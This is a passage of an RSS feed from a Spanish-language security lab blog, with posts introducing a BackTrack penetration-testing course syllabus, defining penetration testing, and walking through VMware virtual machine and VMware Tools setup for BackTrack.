<li><a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd" target="_blank">Imágen ISO</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb" target="_blank">LiveCD USB</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm" target="_blank">Appliance</a> de <strong><a href="http://www.remote-exploit.org/backtrack.html" target="_blank">BackTrack</a></strong></li>
<li>Software de virtualización (<a href="http://www.vmware.com/lasp/products/ws/" target="_blank">VMWare WorkStation</a>, <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a>, <a href="http://es.wikipedia.org/wiki/QEMU" target="_blank">Qemu</a>, <a href="http://www.xoftwarelibre.org/virtualbox-ose-software-libre-para-virtualizacion" target="_blank">Virtual BOX</a>, <a href="http://www.xoftwarelibre.org/moka5-virtualizacion-libre-al-instante" target="_blank">MOKA5</a>, etc.)</li>
<li>PC de mediana capacidad.</li>
<li>Conexión a internet (algunos ejercicios, referencias)</li>
</ol>
<p style="text-align: justify;"><span id="more-211"></span><strong>Contenido temático:</strong></p>
<ol style="text-align: justify;">
<li>Conceptos básicos de BackTrack</li>
<li>Servicios básicos (DHCP, IP, Apache, SSHD, Tftp, VNC)</li>
<li>Entorno básico Bash</li>
<li>NetCat</li>
<li>Wireshark</li>
<li>Nmap</li>
<li>Técnicas de recolección de información</li>
<li>Recursos Web</li>
<li>Reconocimiento DNS</li>
<li>Reconocimiento SNMP</li>
<li>Reconocimiento SMTP</li>
<li>Recolección de información Microsoft Netbios</li>
<li>Escaneo de puertos</li>
<li>ARP Spoofing</li>
<li>Explotación de Buffer overflow en Windows</li>
<li>Fuzzing</li>
<li>Trabajando con Exploits</li>
<li>Transferencia de archivos</li>
<li>Frameworks de explotación</li>
<li>Ataques del lado del cliente</li>
<li>Redirección</li>
<li>Ataques a contraseñas</li>
<li>Vectores de ataques a aplicaciones Web</li>
<li>Troyanos</li>
<li>NTFS Alternate Data Streams</li>
<li>Rootkits</li>
</ol>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL" target="_blank">SQL Injection</a>, <a href="http://es.wikipedia.org/wiki/Caballo_de_Troya_(inform%C3%A1tica)" target="_blank">Troyanos</a>, <a href="http://www.dragonjar.org/anti-rootkit" target="_blank">RootKits</a>, <a href="http://www.ignaciomarcos.com.ar/index.php/2007/02/27/alternate-data-streams/" target="_blank">NTFS Alternate Data Streams</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Fuerza Bruta</a>, <a href="http://es.wikipedia.org/wiki/Redireccionamiento_de_puertos" target="_blank">Redirección</a>, <a href="http://www.trancek.es/2007/10/fuzzing-brute-force-vulnerability.html" target="_blank">Fuzzing</a>, <a href="http://es.wikipedia.org/wiki/Spoofing" target="_blank">Spoofing</a>, <a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a>, <a href="http://es.wikipedia.org/wiki/Bash" target="_blank">Bash</a>, <a href="http://es.wikipedia.org/wiki/Nmap" target="_blank">Nmap</a>.</p>
<p style="text-align: justify;">Este nuevo recurso estará basado en el sistema de entrenamiento ofrecido por los propios desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Test de Penetración con BackTrack, Introducción</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion#comments</comments>
		<pubDate>Wed, 20 Aug 2008 16:33:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Ataques]]></category>
		<category><![CDATA[Distribución]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=203</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes de comenzar con este nuevo recurso y que irá en paralelo con otros laboratorios en desarrollo (<a href="http://labs.dragonjar.org/category/hacking" target="_blank">Laboratorios- Hacking, Técnicas y contramedidas</a>, <a href="http://labs.dragonjar.org/category/hacktaller" target="_blank">DragoNLab-HackTaller</a> y <a href="http://labs.dragonjar.org/category/criptografia" target="_blank">Taller Técnicas Criptográficas</a>), es necesarios aclarar algunos conceptos sobre el mismo.<br />
No sería posible comenzar sin aclarar la finalidad de este laboratorio práctico, las herramientas necesarias y la terminología a utilizar.</p>
<p style="text-align: justify;">Comencemos entonces por definir los conceptos de <strong>Test de Penetración</strong> y <strong>BackTrack</strong>:</p>
<p style="text-align: justify;"><span id="more-203"></span><strong>Test de penetración:</strong><br />
Test de Penetración, también llamado a veces “hacking ético” es una evaluación activa de las medidas de seguridad de la información.<br />
En los entornos de red complejos actuales, la exposición potencial al riesgo es cada vez mayor y securizar los sistemas se convierten en un auténtico reto.<br />
A través del Test de Penetración es posible detectar el nivel de Seguridad Interna y Externa de los Sistemas de Información de la empresa, determinando el grado de acceso que tendría un atacante con intenciones maliciosas. Además, el servicio chequea las vulnerabilidades que pueden ser vistas y explotadas por individuos no autorizados, &#8220;crackers&#8221;, agentes de información, ladrones, antiguos empleados, competidores, etc.</p>
<p style="text-align: justify;"><strong>Los servicios de Test de Penetración permiten:</strong><br />
<strong>-</strong> Evaluar vulnerabilidades por medio de la identificación de debilidades de configuración que puedan ser explotadas.<br />
<strong>-</strong> Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.<br />
<strong>-</strong> Proveer recomendaciones prioritizadas para mitigar y eliminar las debilidades.</p>
<p style="text-align: justify;">El Test de Penetración está dirigido a la búsqueda de agujeros de seguridad de forma focalizada en uno o varios recursos críticos, como puede ser el firewall o el servidor Web.</p>
<p style="text-align: justify;"><strong>BackTrack:</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.<br />
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;">Luego de tener claro las anteriores definiciones podemos entender que la finalidad de nuestro Laboratorio de Test de Penetración con BackTrack, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p style="text-align: justify;">Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://www.microsoft.com/spain/empresas/legal/forensic.mspx" target="_blank">análisis forense</a>, <a href="http://es.wikipedia.org/wiki/Comunicaci%C3%B3n_inal%C3%A1mbrica" target="_blank">Wireless</a>.</p>
<p style="text-align: justify;">En el próximo Laboratorio, definiré los recursos necesarios y el contenido temático del Laboratorio.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Instalación de VMware Tools en BackTrack</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-backtrack</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-backtrack#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:10:18 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=19</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">En la sesión del laboratorio anterior aprendimos a instalar las VMware Tools en Windows 2003 Server, además conocimos algunas de sus utilidades.<br />
<em><strong><a href="http://www.dragonjar.org/laboratorio-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server.xhtml" target="_blank">Clic para recordar las definiciones</a></strong></em></p>
<p style="text-align: justify;">En esta corta sesión de laboratorio haremos lo mismo, pero para nuestra máquina ocupada por BackTrack.</p>
<p style="text-align: justify;">
<p style="text-align: justify;"><span id="more-19"></span><strong>1 -</strong> Así mismo como en el anterior laboratorio, comenzamos el proceso de instalación de las herramientas desde el propio menú de VMware WorkStation. (Install VMware Tools…).</p>
<p style="text-align: justify;"><a href="http://img186.imageshack.us/img186/3209/35411266yl3.jpg" target="_blank"><img src="http://img186.imageshack.us/img186/3209/35411266yl3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong></p>
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>2 -</strong> Veremos a continuación el mismo mensaje informátivo y de advertencia sobre el proceso que estamos a punto de realizar.</p>
<p style="text-align: justify;"><a href="http://img402.imageshack.us/img402/8882/28994238fz9.jpg" target="_blank"><img src="http://img402.imageshack.us/img402/8882/28994238fz9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>3 -</strong> De esta manera aparecera el nuevo dispositivo que contiene los dos paquetes VMware Tools (VMware Tools-x-x-x.i386.rpm, WMware Tools-x-x-x.tar.gz), donde x-x-x, es el número de la versión instalada de VMware WorkStation. Procedemos entonces a “descomprimir” el paquete WMware Tools-x-x-x.tar.gz, por comodidad lo hice en una carpeta en el escritorio.<br />
Abrimos una shell en esa carpeta y procedemos a ejecutar los siguientes comandos:</p>
<p style="text-align: justify;">Comenzaremos creando algunos soft links de los directorios rc.d, para varios niveles de ejecución necesarios por el script de instalación de las VMware Tools. Para obtener más información sobre estos archivos <a href="http://www.osmosislatina.com/linux/archivos_comunes.jsp" target="_blank"><strong>visita este enlace.</strong></a></p>
<p style="text-align: justify;">Los comandos de ejecución serán los siguientes:</p>
<p style="text-align: justify;">for x in 0 1 2 3 4 5 6<br />
do<br />
ln -s /etc/rc.d/ /etc/rc$x.d<br />
done</p>
<p style="text-align: justify;">Después de esto y como estamos en el mismo directorio contenedor del script instalador, procedemos a su ejecución.</p>
<p style="text-align: justify;"><em>vmware-install.pl</em><strong><em> </em></strong></p>
<p style="text-align: justify;"><a href="http://img503.imageshack.us/img503/3184/57719749lk6.jpg" target="_blank"><img src="http://img503.imageshack.us/img503/3184/57719749lk6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>4 -</strong> El proceso posterior a este comando es muy repetitivo, y solo requiere la aprobación de las opciones seleccionadas por defecto, así que podemos continuar mediante la orden ENTER del teclado cuando así lo requiera. Aprovecho para recordar, que cada investigador puede aprovechar las diferentes opciones para profundizar en el tema.</p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/3025/45988293zf4.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/3025/45988293zf4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/3025/45988293zf4.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/3025/45988293zf4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img240.imageshack.us/img240/5067/99782072rc6.jpg" target="_blank"><img src="http://img240.imageshack.us/img240/5067/99782072rc6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>5 -</strong> Finalmente concluimos con la instalación de las VMware Tools, debemos ver la siguiente pantalla.</p>
<p style="text-align: justify;"><a href="http://img186.imageshack.us/img186/5686/55191290qh1.jpg" target="_blank"><img src="http://img186.imageshack.us/img186/5686/55191290qh1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>6 -</strong> Ahora como en la anterior sesión del laboratorio desarrollaremos el ejercicio de realizar un Drag and Drop entre la máquina host y la invitada.</p>
<p style="text-align: justify;"><a href="http://img219.imageshack.us/img219/5143/20788328ee3.jpg" target="_blank"><img src="http://img219.imageshack.us/img219/5143/20788328ee3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>7 -</strong> Arrastramos y soltamos el archivo al escritorio de BackTrack.</p>
<p style="text-align: justify;"><a href="http://img250.imageshack.us/img250/8871/59816899mt0.jpg" target="_blank"><img src="http://img250.imageshack.us/img250/8871/59816899mt0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img259.imageshack.us/img259/5387/10yf1.jpg" target="_blank"><img src="http://img259.imageshack.us/img259/5387/10yf1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>8 -</strong> Archivo transferido a nuestra máquina BackTrack.</p>
<p style="text-align: justify;"><a href="http://img219.imageshack.us/img219/4097/11wk4.jpg" target="_blank"><img src="http://img219.imageshack.us/img219/4097/11wk4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Termina de esta manera la cuarta sesión laboratorio, hagamos un recuento de lo aprendido.</p>
<p style="text-align: justify;">- Instalación de las VMware Tools en la máquina virtual ocupada por BackTrack.<br />
- Transferencia de archivos mediante Drag and Drop.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong><br />
Identificación de Banner’s.</p>
<p style="text-align: justify;"><strong>Taller libre:</strong><br />
Instalar otro S.O en una nueva máquina virtual. (El Sistema Operativo puede ser de libre selección) En lo posible enviar algunas capturas e instrucciones del proceso que se llevó a cabo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-backtrack/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Instalación de máquinas virtuales I</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:02:31 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=13</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El material bibliográfico de estos laboratorios será citado a medida que avancemos en los mismos. Este material es tomado de diversos cursos, diplomados y certificaciones, en los cuales he podido participar, además del material correspondiente a libros que he adquirido con el tiempo, principalmente el libro “<a href="http://www.amazon.com/Practical-Hacking-Techniques-Countermeasures-Spivey/dp/0849370574" target="_blank">Practical Hacking Techniques and Countermeasures</a>”.</p>
<p style="text-align: justify;">El sistema software de virtualización será el mismo utilizado en el libro citado anteriormente: <a href="http://es.wikipedia.org/wiki/VMware" target="_blank"><strong>VMware Workstation</strong></a>, para este caso la versión 6.0 y versión 5.5. Recordar además que es posible utilizar una versión de prueba de este aplicativo por 30 días. Clic para tener más información del programa y llevar a cabo la descarga del mismo &#8211; <strong><a href="http://www.vmware.com/vmwarestore/newstore/wkst601_eval_login.jsp" target="_blank">Versión 6.0.1</a></strong> &#8211; <a href="http://www.vmware.com/vmwarestore/newstore/wkst_eval_login.jsp" target="_blank"><strong>Versión 5.5</strong></a></p>
<p style="text-align: justify;"><span id="more-13"></span>El sistema utilizado como host (donde instalaré el VMware), será una máquina con las siguientes especificaciones técnicas, aunque el programa puede correr con máquinas de más baja capacidad, para más información del aplicativo visitar la <a href="http://www.vmware.com/es/products/desktop/ws_features.html" target="_blank"><strong>página oficial del producto</strong></a></p>
<p style="text-align: justify;"><a href="http://img62.imageshack.us/img62/3479/infokl5.jpg" target="_blank"><img src="http://img62.imageshack.us/img62/3479/infokl5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">El proceso de instalación de este aplicativo no varía y no presenta mayor diferencia a casi la totalidad de instalaciones en entornos Windows, otro aplicativo más que se instala con los típicos “siguiente-siguiente”, solo debe prestarse atención en el momento en que pide confirmar la deshabilitación del autorun de CD’s, esto con el fin de evitar salir abruptamente de la máquina virtual cuando insertamos algún CD.</p>
<p style="text-align: justify;">Para finalizar, solo recordar que el llevar estas técnicas y contramedidas a un laboratorio es idea original del especialista y autor del libro <a href="http://www.virtuallyhacking.com/" target="_blank"><strong>“Practical Hacking Techniques and Countermeasures” &#8211; Mark D. Spivey</strong></a>. Yo trato simplemente de actualizar un poco el contenido, traducir, adaptar e interpretar de la mejor manera, haciendo ver estos laboratorios de un modo más simple a como los presenta el autor, en nuestro idioma y profundizando en los temas que tengo experiencia.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">Luego de instalar el VMware y haber reiniciado el equipo procedemos entonces a ejecutar el programa (doble clic en alguno de los accesos creados por la instalación), para poder llevar a cabo el proceso de instalación de las máquinas virtuales.</p>
<p style="text-align: justify;">Comenzaremos entonces con la instalación de la distribución <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank"><strong>BackTrack</strong></a>. Esta distribución live cd especializada en temas relacionados con la seguridad de la información también puede ser instalada como <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>S.O</strong></a> residente, será esta entonces nuestra opción de <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>Sistema Operativo</strong></a> residente tipo *nix, aprenderemos así como arrancar la live cd y como llevar a cabo la instalación de la misma para que podamos seguir haciendo uso de ella.</p>
<p style="text-align: justify;"><strong>Nota: </strong>Las capturas de pantalla son desarrolladas de la manera más clara e informátiva posible, señalando con recuadros azules los puntos de especial interés.</p>
<p style="text-align: justify;"><strong>Máquina virtual para la distribución BackTrack</strong></p>
<p style="text-align: justify;"><strong>Requerimientos:</strong> Imagen iso o CD de la distribución BackTrack &#8211; Disponibles en el <a href="http://www.remote-exploit.org/backtrack_download.html" target="_blank"><strong>sitio web de descargas del proyecto</strong></a> &#8211; Seleccionar el origen de la imagen iso desde cualquiera de los mirrors disponibles.</p>
<p style="text-align: justify;"><strong>1 -</strong> Clic en nueva máquina virtual</p>
<p style="text-align: justify;"><a href="http://img517.imageshack.us/img517/3572/84980852pi6.jpg" target="_blank"><img src="http://img517.imageshack.us/img517/3572/84980852pi6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>2 -</strong> En el cuadro de diálogo, clic en siguiente.</p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/9966/72349179na6.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/9966/72349179na6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>3 -</strong> Aceptar la configuración típica de la nueva máquina virtual &#8211; Cada investigador puede profundizar en cada una de las diferentes opciones que aparecen en pantalla, para efectos de mejor personalización y apropiación de sus laboratorios.</p>
<p style="text-align: justify;"><a href="http://img186.imageshack.us/img186/4582/54165850ok8.jpg" target="_blank"><img src="http://img186.imageshack.us/img186/4582/54165850ok8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>4 -</strong> Seleccionar como sistema operativo invitado: Linux; versión: Otro Linux</p>
<p style="text-align: justify;"><a href="http://img254.imageshack.us/img254/3482/77319337cp9.jpg" target="_blank"><img src="http://img254.imageshack.us/img254/3482/77319337cp9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>5 -</strong> En este paso es posible asignar un nombre a nuestra máquina virtual, además de una ruta de almacenamiento de la misma.</p>
<p style="text-align: justify;"><a href="http://img516.imageshack.us/img516/7600/65009105to7.jpg" target="_blank"><img src="http://img516.imageshack.us/img516/7600/65009105to7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>6 -</strong> Pasamos de este modo a la pantalla de configuración de nuestro tipo de red. Tenemos 4 opciones disponibles para este efecto. Una breve descripción de estas opciones será la siguiente:</p>
<p style="text-align: justify;">- <strong>Use bridged networking:</strong> Nuestra máquina virtual tomará una <a href="http://es.wikipedia.org/wiki/Direcci%C3%B3n_IP" target="_blank"><strong>IP</strong></a> propia y con esta será identificada en internet.</p>
<p style="text-align: justify;">- <strong>Use network address translation (NAT- Traducción de dirección de red):</strong> Nuestra máquina virtual tomará la misma IP que nuestra máquina host, haciendo posible la conexión a internet con esta identificación, además de permitirnos crear pequeñas redes virtuales, objetivo primordial de nuestros laboratorios.</p>
<p style="text-align: justify;">- <strong>Use host-only networking:</strong> Conecta nuestra máquina virtual a una red privada virtual en nuestro sistema host.</p>
<p style="text-align: justify;">- <strong>Do not use a network connection:</strong> No usar conexiones de red.</p>
<p style="text-align: justify;">Para nuestros laboratorios utilizaremos en mayor medida la opción ofrecida mediante el acceso <a href="http://es.wikipedia.org/wiki/Network_Address_Translation" target="_blank"><strong>NAT</strong></a>, escojemos entonces este campo.</p>
<p style="text-align: justify;"><a href="http://img159.imageshack.us/img159/4374/31589523kq4.jpg" target="_blank"><img src="http://img159.imageshack.us/img159/4374/31589523kq4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>7 &#8211; </strong>Ahora seleccionamos el tamaño de nuestro disco duro virtual. El tamaño por defecto puede variar según el tamaño real de tu DD, para nuestro sistema BackTrack es suficiente con 4.0 Gigas, las dos opciones adicionales en pantalla:<br />
<strong>Allocate all disk space now: </strong>Nos permite asignar desde un comienzo este espacio real a nuestro disco virtual, mientras que, dejando sin seleccionar esta opción el espacio será ocupado a medida que se haga necesario para la máquina virtual.<br />
<strong>Split disk into 2 GB files: </strong>Permite dividir el espacio asignado en pequeñas particiones de 2 GB.</p>
<p style="text-align: justify;">Para esta máquina dejaremos las opciones asignadas por defecto. Recuerdo de nuevo que cada investigador puede profundizar en cada una de las opciones ofrecidas por el aplicativo de virtualización. Para más información estudiar la <a href="http://www.vmware.com/support/pubs/ws_pubs.html" target="_blank"><strong>documentación del producto</strong>.</a></p>
<p style="text-align: justify;">Con estos sencillos paso hemos creado nuestra primera máquina virtual del laboratorio. La captura de pantalla nos muestra el nombre que le asignamos en pasos anteriores, ubicación e información de los dispositivos.</p>
<p style="text-align: justify;"><a href="http://img99.imageshack.us/img99/4448/fincw5.jpg" target="_blank"><img src="http://img99.imageshack.us/img99/4448/fincw5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Pasemos ahora a la carga de nuestra LiveCD BackTrack, para su posterior instalación.</p>
<p style="text-align: justify;">Dependiendo de la opción de grabación de la <a href="http://es.wikipedia.org/wiki/Imagen_ISO" target="_blank"><strong>imagen iso</strong></a>, podremos arrancar la misma desde la unidad de CD virtual o desde la <a href="http://es.wikipedia.org/wiki/Imagen_ISO" target="_blank"><strong>imagen iso</strong></a>. &#8211; Esta opción puede seleccionarse dando doble clic en CD-ROM (IDE), usar drive físico (imagen grabada de la <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank"><strong>distro</strong></a>), ó usando <a href="http://es.wikipedia.org/wiki/Imagen_ISO" target="_blank"><strong>imagen iso</strong></a> (seleccionar, buscar y aceptar-ok).</p>
<p style="text-align: justify;">Clic en <strong><em>Start this virtual machine</em></strong> el panel <em><strong>Commands</strong></em>.</p>
<p style="text-align: justify;"><strong>8 -</strong> Cargará la <a href="http://es.wikipedia.org/wiki/BIOS" target="_blank"><strong>BIOS</strong></a> de nuestra máquina virtual.</p>
<p style="text-align: justify;"><a href="http://img54.imageshack.us/img54/273/88408691vv1.jpg" target="_blank"><img src="http://img54.imageshack.us/img54/273/88408691vv1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>9 -</strong> Comienza el sistema de <a href="http://es.wikipedia.org/wiki/Booteo" target="_blank"><strong>booteo</strong></a> de backTrack.</p>
<p style="text-align: justify;"><a href="http://img125.imageshack.us/img125/1193/10lu0.jpg" target="_blank"><img src="http://img125.imageshack.us/img125/1193/10lu0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>10 -</strong> Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de <a href="http://es.wikipedia.org/wiki/Login" target="_blank"><strong>login</strong></a>. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.</p>
<p style="text-align: justify;"><a href="http://img223.imageshack.us/img223/7536/11od8.jpg" target="_blank"><img src="http://img223.imageshack.us/img223/7536/11od8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>11 -</strong> Para logearnos en el sistema ingresamos:<br />
usuario: <strong>root</strong><br />
contraseña: <strong>toor</strong></p>
<p style="text-align: justify;"><a href="http://img204.imageshack.us/img204/2664/12oo4.jpg" target="_blank"><img src="http://img204.imageshack.us/img204/2664/12oo4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>12 -</strong> Como desde un comienzo seleccionamos la opción de acceso a la red mediante NAT, podemos observar gracias al comando <a href="http://es.wikipedia.org/wiki/Ifconfig" target="_blank"><strong>ifconfig</strong></a> nuestras interfaces de redes.</p>
<p style="text-align: justify;"><a href="http://img106.imageshack.us/img106/7615/13ab6.jpg" target="_blank"><img src="http://img106.imageshack.us/img106/7615/13ab6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>13 -</strong> Luego podemos cargar el <a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>entorno gráfico</strong></a> de BackTrack mediante el siguiente comando:<br />
<a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>startx</strong></a></p>
<p style="text-align: justify;"><a href="http://img130.imageshack.us/img130/4568/14jg6.jpg" target="_blank"><img src="http://img130.imageshack.us/img130/4568/14jg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>14 -</strong> Entorno gráfico cargando.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/7319/15bw9.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/7319/15bw9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>15 -</strong> BackTrack cargado como Live CD en su totalidad.</p>
<p style="text-align: justify;"><a href="http://img124.imageshack.us/img124/4858/31hm3.jpg" target="_blank"><img src="http://img124.imageshack.us/img124/4858/31hm3.th.jpg" border="0" alt="" /></a></p>
